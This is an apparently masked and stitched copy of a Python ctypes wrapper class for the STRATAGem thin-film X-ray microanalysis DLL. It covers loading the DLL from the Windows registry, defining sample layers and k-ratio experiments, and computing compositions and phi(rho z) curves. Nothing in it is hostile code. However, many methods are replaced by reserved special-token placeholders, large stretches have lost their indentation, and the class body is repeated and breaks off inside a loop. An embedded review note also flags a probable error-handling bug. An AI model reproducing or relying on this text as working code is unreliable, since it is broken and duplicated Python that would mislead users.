with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
) as key:
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug('dll=%s', dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd)
logger.debug('StEnableErrorDisplay(%r)', display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {}
self._substrate = None
self._experiments = {}
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
<|reserved_special_token_0|>
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
<|reserved_special_token_0|>
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
<|reserved_special_token_0|>
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
key_ = self._stobjectnew(standard=True)
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error('Cannot save standard')
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1000.0)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error('Cannot add atomic number and line')
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_
):
self._raise_error('Cannot set standard')
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error('Cannot add experiment analyzed flag')
kratio_ = c.c_double(experiment.kratio)
logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
hv_, kratio_, c.c_double(0.0), c.c_int(2)):
self._raise_error('Cannot set experiment k-ratio')
if experiment.is_analyzed():
indexes = ielt_.value, iline_.value, iexpk_.value
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    @_check_key
    def get_prz_mode(self):
        """
        Returns the type of model to use for the :math:`\\phi(\\rho z)`.
        :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
        :data:`PRZMODE_GAU`
        :rtype: :class:`int`
        """
        # NOTE(review): unlike most calls here, StGetPrzMode takes no object
        # key -- presumably a DLL-global setting; confirm with the SDK docs.
        return self._lib.StGetPrzMode()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    @_check_key
    def get_fluorescence(self):
        """
        Returns the fluorescence flag.
        :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
        or :data:`FLUORESCENCE_LINE_CONT`
        :rtype: :class:`int`
        """
        # NOTE(review): StGetFluorFlg takes no object key -- presumably a
        # DLL-global setting; confirm with the SDK docs.
        return self._lib.StGetFluorFlg()
<|reserved_special_token_0|>
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
    @_check_key
    def get_standard_directory(self):
        """
        Returns the directory where standard files are stored.
        :rtype: :class:`str`
        """
        # 256-byte buffer filled in place by the DLL; directory type 1
        # matches set_standard_directory.
        dirpath = (c.c_char * 256)()
        self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
        return dirpath.value.decode('ascii')
<|reserved_special_token_0|>
    @_check_key
    def compute_kratio_vs_thickness(self, layer, thickness_low_m,
        thickness_high_m, step):
        """
        Computes the variation of the k-ratio as a function of the thickness
        for a layer.
        :arg layer: layer of a sample (must have been previously added)
        :type layer: :class:`.Layer`
        :arg thickness_low_m: lower limit of the thickness in meters
        :type thickness_low_m: :class:`float`
        :arg thickness_high_m: upper limit of the thickness in meters
        :type thickness_high_m: :class:`float`
        :arg step: number of steps
        :type step: :class:`int`
        :return: :class:`tuple` containing
            * :class:`list` of thicknesses
            * :class:`dict` where the keys are experiments (as defined by
              :meth:`.add_experiment`) and the values are :class:`list`
              containing k-ratios for each thickness
        :raises ValueError: if *layer* is not part of the current sample
        """
        # Unit 2: thicknesses below are passed in nanometers (m * 1e9).
        logger.debug('StSetKvsThicknessUnit(2)')
        self._lib.StSetKvsThicknessUnit(2)
        if layer not in self._layers:
            raise ValueError('Unknown layer')
        ilayer = self._layers[layer]
        ilayer_ = c.c_int(ilayer)
        step_ = c.c_int(step)
        logger.debug('StSetNbComputedHV(%i)', step)
        self._lib.StSetNbComputedHV(step_)
        low_ = c.c_double(thickness_low_m * 1000000000.0)
        high_ = c.c_double(thickness_high_m * 1000000000.0)
        logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
            thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
        if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
            ):
            self._raise_error('Cannot compute k-ratio vs thickness')
        thicknesses = []
        kratios = {}
        thick_ = c.c_double()
        k_ = c.c_double()
        # step intervals yield step + 1 sampled thicknesses.
        for i in range(step + 1):
            i_ = c.c_int(i)
            if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
                self._raise_error('Cannot get thickness')
            thicknesses.append(thick_.value)
            for experiment, indexes in self._experiments.items():
                ielt_ = c.c_int(indexes[0])
                iline_ = c.c_int(indexes[1])
                iHv_ = c.c_int(indexes[2])
                if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
                    iHv_, c.byref(k_)):
                    self._raise_error('Cannot get k-ratio')
                kratios.setdefault(experiment, []).append(k_.value)
        return thicknesses, kratios
<|reserved_special_token_0|>
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
    @_check_key
    def _compute_kratios_multilayers(self):
        """
        Internal method to compute the k-ratios using the
        :meth:`compute_kratio_vs_thickness`.
        All layer thicknesses must be known.
        :return: :class:`dict` mapping experiments to k-ratios
        :raises ValueError: if the thickness of any layer is unknown
        """
        for i, layer in enumerate(self._layers.keys()):
            if not layer.is_thickness_known():
                raise ValueError('Thickness of layer %i is unknown' % i)
        # Run a minimal (1-step) thickness scan on the first layer starting
        # exactly at its actual thickness: the first scan point is then the
        # k-ratio of the sample as defined.
        layer = list(self._layers.keys())[0]
        thickness_low_m = layer.thickness_m
        thickness_high_m = layer.thickness_m * 10
        step = 1
        _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
            thickness_low_m, thickness_high_m, step)
        output = {}
        for experiment, kratio in kratios.items():
            output.setdefault(experiment, kratio[0])
        return output
<|reserved_special_token_0|>
    @_check_key
    def compute(self, iteration_max=50):
        """
        Computes the unknown composition(s) and thickness(es) in the specified
        sample.
        :arg iteration_max: maximum number of iterations of the solve
            (default: 50)
        :type iteration_max: :class:`int`
        :return: calculated sample
        :rtype: :class:`.Sample`
        """
        # Elements present in the sample but never measured get a dummy,
        # non-analyzed experiment so the DLL knows about them.
        zs = set(exp.z for exp in self._experiments.keys())
        for layer in (list(self._layers.keys()) + [self._substrate[0]]):
            for z, wf in layer.composition.items():
                if z in zs:
                    continue
                if wf is None:
                    continue
                logger.debug('Added dummy experiment for z=%i', z)
                exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
                self.add_experiment(exp)
        iteration_max_ = c.c_int(iteration_max)
        logger.debug('StSetMaxNbIter(%i)', iteration_max)
        self._lib.StSetMaxNbIter(iteration_max_)
        logger.debug('StComputeIterpStart(key)')
        if not self._lib.StComputeIterpStart(self._key):
            self._raise_error('Cannot start iteration')
        continue_ = c.c_bool(True)
        iteration = 0
        logger.debug('Start iteration')
        # Step the solver until the DLL reports convergence (continue_
        # cleared) or failure (StComputeIterpNext returns false).
        while True:
            iteration += 1
            logger.debug('Iteration #%i' % iteration)
            logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
            if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
                break
            if not continue_.value:
                break
        logger.debug('Iteration completed')
        # Out-parameters reused for every layer read-back below.
        thick_known = c.c_bool()
        mass_thickness = c.c_double()
        thickness = c.c_double()
        density = c.c_double()
        def get_layer(layer, ilayer):
            # Reads back the computed composition and thickness of one layer
            # and converts everything to SI units (inverse of _add_layer).
            ilayer_ = c.c_int(ilayer)
            logger.debug('StSdGetNbElts(key, %i)' % ilayer)
            nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
            if nbelt == -1:
                self._raise_error('Cannot get number of elements')
            flag_ = (c.c_int * nbelt)()
            wfs_ = (c.c_double * nbelt)()
            logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
            if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
                ):
                self._raise_error('Cannot get layer concentration')
            composition = {}
            for z in layer.composition.keys():
                nra_ = c.c_int(z)
                logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
                zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
                composition[z] = wfs_[zindex]
            logger.debug('StSdGetThick(key, %i)', ilayer)
            if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
                thick_known), c.byref(mass_thickness), c.byref(thickness),
                c.byref(density)):
                self._raise_error('Cannot get thickness')
            return (composition, thickness.value / 10000000000.0,
                mass_thickness.value * 10.0, density.value * 1000.0)
        sample = Sample(get_layer(*self._substrate)[0])
        for layer, ilayer in self._layers.items():
            sample.add_layer(*get_layer(layer, ilayer))
        return sample
    @_check_key
    def compute_prz(self, maxdepth_m=None, bins=100):
        """
        Compute :math:`\\phi(\\rho z)` of all experiments.
        .. warning:: Only available for substrate (no layers).
        :arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
            distribution in meters. If ``None``, Kanaya-Okayama electron range
            is used with a safety factor of 1.5.
        :type maxdepth_m: :class:`float`
        :arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
        :type bins: :class:`int`
        :return: a :class:`dict` where the keys are the experiments and the
            values are a tuple containing three lists:
            * :math:`\\rho z` coordinates (in g/cm2)
            * generated intensities of :math:`\\phi(\\rho z)` (no absorption)
            * emitted intensites of :math:`\\phi(\\rho z)`
        :raises RuntimeError: if layers are defined
        """
        if len(self._layers) > 0:
            raise RuntimeError('PRZ can only be computed for substrate')
        # Scale the computation to the highest beam energy of all experiments.
        hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
        maxhv_eV = max(hvs_eV)
        maxhv_ = c.c_double(maxhv_eV / 1000.0)
        logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
        self._lib.StSetScaleHV(maxhv_)
        logger.debug('StComputePrz(key)')
        if not self._lib.StComputePrz(self._key):
            self._raise_error('Cannot compute prz')
        przs = {}
        for experiment, indexes in self._experiments.items():
            if maxdepth_m is None:
                # Kanaya-Okayama electron range averaged over the substrate
                # composition, times a 1.5 safety factor.
                maxdepth_m = 0.0
                energy_keV = experiment.energy_eV / 1000.0
                for z, fraction in self._substrate[0].composition.items():
                    dr = 0.0276 * atomic_mass_kg_mol(z
                        ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
                        mass_density_kg_m3(z) / 1000.0)
                    maxdepth_m += fraction / (dr * 1e-06)
                maxdepth_m = 1.0 / maxdepth_m
                maxdepth_m *= 1.5
            increment_kg_m2 = maxdepth_m * self._substrate[0
                ].density_kg_m3 / bins
            ielt_ = c.c_int(indexes[0])
            iline_ = c.c_int(indexes[1])
            # NOTE(review): the stored HV index (indexes[2]) is not used;
            # the first computed HV (0) is queried instead -- confirm this
            # is intentional.
            ihv_ = c.c_int(0)
            rzs = []
            ys_generated = []
            ys_emitted = []
            for i in range(bins):
                # DLL expects mg/cm2 (kg/m2 * 0.1); rzs keeps kg/m2 for the
                # g/cm2 coordinates promised by the docstring.
                rz_ = c.c_double(i * increment_kg_m2 * 0.1)
                rzs.append(i * increment_kg_m2)
                y_ = c.c_double()
                bUseExp_ = c.c_bool(True)
                self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
                    bUseExp_, c.byref(y_))
                ys_emitted.append(y_.value)
                y_ = c.c_double()
                bUseExp_ = c.c_bool(False)
                self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
                    bUseExp_, c.byref(y_))
                ys_generated.append(y_.value)
            przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
        return przs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Stratagem:
<|reserved_special_token_0|>
    def __init__(self, dll_path=None, display_error=True):
        """
        :arg dll_path: complete path to the location of ``stratadllogger.dll``
            (optional). If ``None``, the path is found in the Windows registry
            under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
            found a :class:`StratagemError` is raised.
        :type dll_path: :class:`str`
        :arg display_error: whether to display a message dialog on error
        :type display_error: :class:`bool`
        """
        if dll_path is None:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
                ) as key:
                basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
                dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
        # Restore the working directory after loading -- presumably loading
        # the DLL can change it; nothing visible here does (TODO confirm).
        cwd = os.getcwd()
        try:
            logger.debug('dll=%s', dll_path)
            self._lib = c.WinDLL(dll_path)
        finally:
            os.chdir(cwd)
        logger.debug('StEnableErrorDisplay(%r)', display_error)
        self._lib.StEnableErrorDisplay(c.c_bool(display_error))
        # DLL object key; None until init() is called.
        self._key = None
        self._cwd = os.getcwd()
        # Layer -> layer index inside the DLL sample definition.
        self._layers = {}
        # (substrate layer, index) tuple once a sample is set.
        self._substrate = None
        # Experiment -> (ielt, iline, iexpk) DLL indexes.
        self._experiments = {}
        # Paths of temporary standard files written by _create_standard.
        self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
<|reserved_special_token_0|>
    def _raise_error(self, alternate=''):
        """
        Raises a :class:`StratagemError`.
        The error code and message of known errors are retrieved from STRATAGem.
        If this is not possible, *alternate* is used as the error message.
        :arg alternate: fallback message when the DLL reports no error
        :raises StratagemError: always (or an :class:`OSError` via
            :func:`ctypes.WinError` for system errors)
        """
        errnum_ = c.c_ulong()
        errtype_ = c.c_int()
        self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
        if errnum_.value != 0:
            if errtype_.value == 0:
                # Error type 0: a STRATAGem message, resolved via StGetMsg.
                buf_ = c.create_string_buffer(256)
                self._lib.StGetMsg(errnum_, buf_, 256)
                raise StratagemError(buf_.value.decode('ascii'))
            elif errtype_.value == 1:
                # NOTE(review): passes the error *type* (always 1 here) to
                # WinError instead of the error number -- looks like a bug;
                # confirm whether errnum_.value was intended.
                raise c.WinError(errtype_.value)
            else:
                raise StratagemError('Error %i' % errnum_.value)
        else:
            raise StratagemError(alternate)
    def init(self):
        """
        Initializes and setups STRATAGem.
        It does not have to be used if :class:`Stratagem` is used as a context
        manager.
        :raises RuntimeError: if already initialized (close() not called)
        """
        if self._key is not None:
            raise RuntimeError('Already initialized. Call close() first.')
        self._key = self._stobjectnew()
        self._cwd = os.getcwd()
        self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
<|reserved_special_token_0|>
    @_check_key
    def set_sample(self, sample):
        """
        Sets the sample, which will be used in all subsequent calculations.
        Note that only one sample can be defined.
        :arg sample: sample definition
        :type sample: :class:`Sample`
        """
        self.reset()
        # Layers are registered from top to bottom; the substrate is added
        # last because the DLL treats the last layer as the substrate.
        for layer in sample.layers:
            index = self._add_layer(layer, substrate=False)
            self._layers.setdefault(layer, index)
        index = self._add_layer(sample.substrate, substrate=True)
        self._substrate = sample.substrate, index
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
    def _create_standard(self, standard):
        """
        Internal method to create a new object defining the standard
        :class:`.Sample`.
        Writes the standard to a temporary ``.tfs`` file in the standard
        directory; the file is removed again by :meth:`close`.
        :arg standard: standard sample definition
        :return: path of the written standard file
        :rtype: :class:`str`
        """
        key_ = self._stobjectnew(standard=True)
        for layer in standard.layers:
            self._add_layer(layer, substrate=False, key=key_)
        self._add_layer(standard.substrate, substrate=True, key=key_)
        # The random object key doubles as the file name.
        filename = key_.value.decode('ascii') + '.tfs'
        filepath = os.path.join(self.get_standard_directory(), filename)
        filepath_ = c.create_string_buffer(filepath.encode('ascii'))
        logger.debug('StObjectWriteFile(key, %s)', filepath)
        if not self._lib.StObjectWriteFile(key_, filepath_):
            self._raise_error('Cannot save standard')
        self._lib.StObjectDelete(key_)
        self._tmpstandards.append(filepath)
        return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1000.0)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error('Cannot add atomic number and line')
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_
):
self._raise_error('Cannot set standard')
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error('Cannot add experiment analyzed flag')
kratio_ = c.c_double(experiment.kratio)
logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
hv_, kratio_, c.c_double(0.0), c.c_int(2)):
self._raise_error('Cannot set experiment k-ratio')
if experiment.is_analyzed():
indexes = ielt_.value, iline_.value, iexpk_.value
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
<|reserved_special_token_0|>
    @_check_key
    def get_geometry(self):
        """
        Returns the geometry.
        :return: take off angle (in radians), tilt angle (in radians),
            azimuthal angle (in radians)
        :rtype: :class:`tuple` of three :class:`float`
        """
        # All three values are out-parameters filled by the DLL.
        toa_ = c.c_double()
        tilt_ = c.c_double()
        azimuth_ = c.c_double()
        logger.debug('StGetGeomParams(key)')
        if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(
            tilt_), c.byref(azimuth_)):
            self._raise_error('Cannot get geometry parameters')
        return toa_.value, tilt_.value, azimuth_.value
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
<|reserved_special_token_0|>
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
<|reserved_special_token_0|>
@_check_key
def compute_kratio_vs_thickness(self, layer, thickness_low_m,
thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2)
if layer not in self._layers:
raise ValueError('Unknown layer')
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
low_ = c.c_double(thickness_low_m * 1000000000.0)
high_ = c.c_double(thickness_high_m * 1000000000.0)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
):
self._raise_error('Cannot compute k-ratio vs thickness')
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
